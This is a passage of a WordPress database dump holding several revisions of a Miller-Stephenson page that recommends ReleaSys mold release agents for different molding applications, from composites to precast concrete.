tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinforced Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 12:15:24', '2017-06-08 12:15:24', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4499, 2, '2017-06-08 12:26:34', '2017-06-08 12:26:34', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[button text="ADVANCED COMPOSITES" target="href=#"]\n\n[button text="ROTATIONAL PLASTIC"]\n\n[button text="POLYURETHANE"]\n\n[button text="RUBBER - SILICONE - ELASTOMER"]\n\n[button text="INJECTION PLASTICS"]\n\n[button text="FIBERGLASS"]\n\n[button text="PRE-CAST /  REINFORCED CONCRETE"]\n\n[button text="CUSTOM FORMULATIONS"]\n\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinforced Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 12:26:34', '2017-06-08 12:26:34', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4500, 2, '2017-06-08 12:27:32', '2017-06-08 12:27:32', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[button text="ADVANCED COMPOSITES" target="href=#"]\n\n[button text="ROTATIONAL PLASTIC"]\n\n[button text="POLYURETHANE"]\n\n[button text="RUBBER-SILICONE-ELASTOMER"]\n\n[button text="INJECTION PLASTICS"]\n\n[button text="FIBERGLASS"]\n\n[button text="PRE-CAST /  REINFORCED CONCRETE"]\n\n[button text="CUSTOM FORMULATIONS"]\n\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinforced Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 12:27:32', '2017-06-08 12:27:32', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4501, 2, '2017-06-08 12:27:52', '2017-06-08 12:27:52', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[button text="ADVANCED COMPOSITES" target="href=#"]\n\n[button text="ROTATIONAL PLASTIC"]\n\n[button text="POLYURETHANE"]\n\n[button text="RUBBER-SILICONE-ELASTOMER"]\n\n[button text="INJECTION PLASTICS"]\n\n[button text="FIBERGLASS"]\n\n[button text="PRECAST /  REINFORCED CONCRETE"]\n\n[button text="CUSTOM FORMULATIONS"]\n\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinforced Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 12:27:52', '2017-06-08 12:27:52', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
